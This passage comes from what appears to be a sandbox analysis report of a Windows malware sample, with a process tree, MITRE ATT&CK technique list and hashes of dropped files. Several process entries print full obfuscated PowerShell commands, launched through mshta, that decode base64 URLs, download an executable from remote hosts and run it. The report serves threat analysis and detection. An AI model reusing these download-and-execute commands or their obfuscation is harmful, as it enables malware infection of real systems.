        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8808 /prefetch:1
        5⤵
        
        PID:6892
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10692 /prefetch:1
        5⤵
        
        PID:6900
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10828 /prefetch:1
        5⤵
        
        PID:1144
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10736 /prefetch:1
        5⤵
        
        PID:4384
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8244 /prefetch:1
        5⤵
        
        PID:5548
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9784 /prefetch:1
        5⤵
        
        PID:5192
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10032 /prefetch:1
        5⤵
        
        PID:7112
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9132 /prefetch:1
        5⤵
        
        PID:5988
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10488 /prefetch:1
        5⤵
        
        PID:3572
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.my-data-recovery.com/
      4⤵
      PID:1100
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x130,0x134,0x138,0x10c,0x13c,0x7ff8066b46f8,0x7ff8066b4708,0x7ff8066b4718
        5⤵
        
        PID:2532
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6E69.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4728
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6112
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6E69.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2228
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5980
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:1120
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6E69.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3556
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3872
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6E69.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2884
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2128
- - C:\Windows\SysWOW64\timeout.exe
    timeout 2
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:4060
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6E69.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3932
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5960
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\6E69.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5956
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5392

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4768

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1520

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:552

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
12bdf3bfbe10afc0b9b8a30fe850f3dc

SHA1
882017f1f6a343f271a6b2849b85b45ff1e70831

SHA256
757e90fd2cd589edaea349007bc83485bc9f8ce0099e3cf28ce12dd0d7aa558b

SHA512
2f0c33f86a95a7bd7410e149072c2ebb28850be6debbcde7b735f7c564abd9871cdd19fc549b6a0a1183c30b0e525bccae794aa91aef2e4aa270c41904fca14e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5e66a3d46ce02326d71914c69bb1ff5e

SHA1
91ccf10b11a8c2d127fe825840b0f5a3c5a51513

SHA256
8408d688778cfc5151fd454f1182175674719a8a5709dd36aaac95512c7b1054

SHA512
3fc4c3299a000fd48b25ec9fa88d87892fe60b3e82005195d0afc80e028ff270e1429bb2a4fc07cfcfd5d8c23a44283c92a11f9ff11d28ec951331e3df05326c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9d9e89a46ea1c979d600d8ecff95392f

SHA1
a03b20076c4a9bd34d03af90e43d5815943d187b

SHA256
7d5e0d521951eff280f780f5134b8f1b4c614bb4e96ce15577201272a1e4478c

SHA512
7bd673c3e908e62928b35bb2ca183a79e575775a1b76b1bd3e584c9da331d4a4c213b3de25fe209090504ce0af3f3823a27767196ed81cceb7f881106e068429

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8b9c8cdf7aaf5e5f0d45a9df0c6927df

SHA1
f95899529264826c7aecfb5efc8c3bf01bdfd650

SHA256
5faed2516ff468641fe1916b224db4327a3088a1d780c0ac79df6500c9deb849

SHA512
ea7abef78f5539d5a24c2e4935601c595494c2b30dcda4b218c1f79b5d1ca66b8c3188b9df789ef78a223f50b19a8b1f2849002f9a233dda34dbd350ce058b9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5451dae98cfd02b0a5b9fdb4950bc7a1

SHA1
34023b565b65217048d7229ff3add9b97273c34f

SHA256
3d4cc0529dc00b3348922e338851aec08578fd81635f22ed404de2ace3deaa2a

SHA512
79825617110b16107a6b70814acd3bd84edc190b48aaeaf39b1814f009d5081dde5f22673226ffc4925aac166b23b6987a49d57d61b2000d545a7b1e86548f3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
602f8cfffb1d7e09768a1dcfe379239d

SHA1
144101ccc8c0ca0b2b7779e058da32e88cde6678

SHA256
e96f9b4d99ccd1d076068328e4429ee6d0abc49b9fa573a6c76c7e42c239cb22

SHA512
b5123669f83d3c921b3510d870787b59c8c0ecddde24fcfffe2810b44c47ebe915a20ac085741d51d5ccd54ce80651d4899f92eb019a69847275821e5e0b5260

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\4f916283-f112-4027-b3c2-81aca01d68f5.tmp

Filesize
1KB

MD5
2a144fe65543cee868cb3c8ef9b2f920

SHA1
d63e9c8e916af77b48143ef3542843458bdee133

SHA256
afaa7d59d2bfb8e02f831d7650fae52e6d0703ff04d55e1f4080af90f44dffa3

SHA512
52a83f1427ccd7d67f4e0f406d9bd90c5983f12092d2dc1d43ed51719b82e8a9dfb4b1e45e2096bb9821cd9b8fc15513c1b4f5c37f4e67dba6a41990dd20ec72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
39KB

MD5
9a01b69183a9604ab3a439e388b30501

SHA1
8ed1d59003d0dbe6360481017b44665153665fbe

SHA256
20b535fa80c8189e3b87d1803038389960203a886d502bc2ef1857affc2f38d2

SHA512
0e6795255b6eea00b5403fd7e3b904d52776d49ac63a31c2778361262883697943aedcb29feee85694ba6f19eaa34dddb9a5bfe7118f4a25b4757e92c331feca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
215KB

MD5
d474ec7f8d58a66420b6daa0893a4874

SHA1
4314642571493ba983748556d0e76ec6704da211

SHA256
553a19b6f44f125d9594c02231e4217e9d74d92b7065dc996d92f1e53f6bcb69

SHA512
344062d1be40db095abb7392b047b16f33ea3043158690cf66a2fa554aa2db79c4aa68de1308f1eddf6b9140b9ac5de70aad960b4e8e8b91f105213c4aace348

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

Filesize
29KB

MD5
49963fe197877ceec4a76956b329d92c

SHA1
6ab36e03ab8800663438711ec4acd62bb1496eef

SHA256
9eb442caf593ea96298bcb44a7fb79f24c414ceeece61aea0357e44008889602

SHA512
d4bbbe7c8045528653550739a70f18cedb6b126888ee1b4432906b5cb8c1ab579b28092812cda68b961ddfe1c05c5cdcff1d4b0ad8263949e0a59569dafce265

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

Filesize
22KB

MD5
aebc1bef9f4e39ee03eb03bbe8fb4a04

SHA1
9a9731bfd3b40f6e73eaf8cea7c4f9f7af5f6236

SHA256
7728af80f4c4019305d621f96578822ccc3fdc91acefe726d23b29e4b301c758

SHA512
10fd80d7e445fbc81c21df0bdc887d094d098e884d3e85647bb25cadf1e82bf0204aba7d4ab52fc21656b9835144e25c3f486dc9ecf071050a5e18371c68d7f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023

Filesize
64KB

MD5
d6b36c7d4b06f140f860ddc91a4c659c

SHA1
ccf16571637b8d3e4c9423688c5bd06167bfb9e9

SHA256
34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

SHA512
2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

Filesize
67KB

MD5
69df804d05f8b29a88278b7d582dd279

SHA1
d9560905612cf656d5dd0e741172fb4cd9c60688

SHA256
b885987a52236f56ce7a5ca18b18533e64f62ab64eb14050ede93c93b5bd5608

SHA512
0ef49eeeeb463da832f7d5b11f6418baa65963de62c00e71d847183e0035be03e63c097103d30329582fe806d246e3c0e3ecab8b2498799abbb21d8b7febdc0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000025

Filesize
63KB

MD5
226541550a51911c375216f718493f65

SHA1
f6e608468401f9384cabdef45ca19e2afacc84bd

SHA256
caecff4179910ce0ff470f9fa9eb4349e8fb717fa1432cf19987450a4e1ef4a5

SHA512
2947b309f15e0e321beb9506861883fde8391c6f6140178c7e6ee7750d6418266360c335477cae0b067a6a6d86935ec5f7acdfdacc9edffa8b04ec71be210516

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026

Filesize
19KB

MD5
1bd4ae71ef8e69ad4b5ffd8dc7d2dcb5

SHA1
6dd8803e59949c985d6a9df2f26c833041a5178c

SHA256
af18b3681e8e2a1e8dc34c2aa60530dc8d8a9258c4d562cbe20c898d5de98725

SHA512
b3ff083b669aca75549396250e05344ba2f1c021468589f2bd6f1b977b7f11df00f958bbbd22f07708b5d30d0260f39d8de57e75382b3ab8e78a2c41ef428863

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004c

Filesize
52KB

MD5
80638391e74a7043800c2cd649788674

SHA1
8fe95ec2dfd80c10d1fb83877515024c504f2aa1

SHA256
4a0066498d61acd86e1953e0753c80ab8ba79314914b29e37cc78cc068f2d1e1

SHA512
d5c6a23ab063de40bd40f43b7cc5b9df0aa652e085f05ae843fc927736038214e3b537b37f6ac116101bd06742eabefa945d0f04d1017a9db1502f0b35483f45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004d

Filesize
76KB

MD5
7279b6a0c1b390915d9629b2e0ae1c8b

SHA1
d32bfcb9db289e8fac61d75a36f55c1d7af61310

SHA256
25aa2a2b24f031a3bcec886c85c66c80bedd977da304eeba60a5359609883591

SHA512
5b047d8660acf59b02794715ca058230cf10088c31b9c0a74dbf15a5f401c49e860263bd13000355a20e184a0fe47ff62dc886b2853dc11fb207c7b2a5fa4174

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004e

Filesize
133KB

MD5
622a104f58b5bd85168f39214a487d1c

SHA1
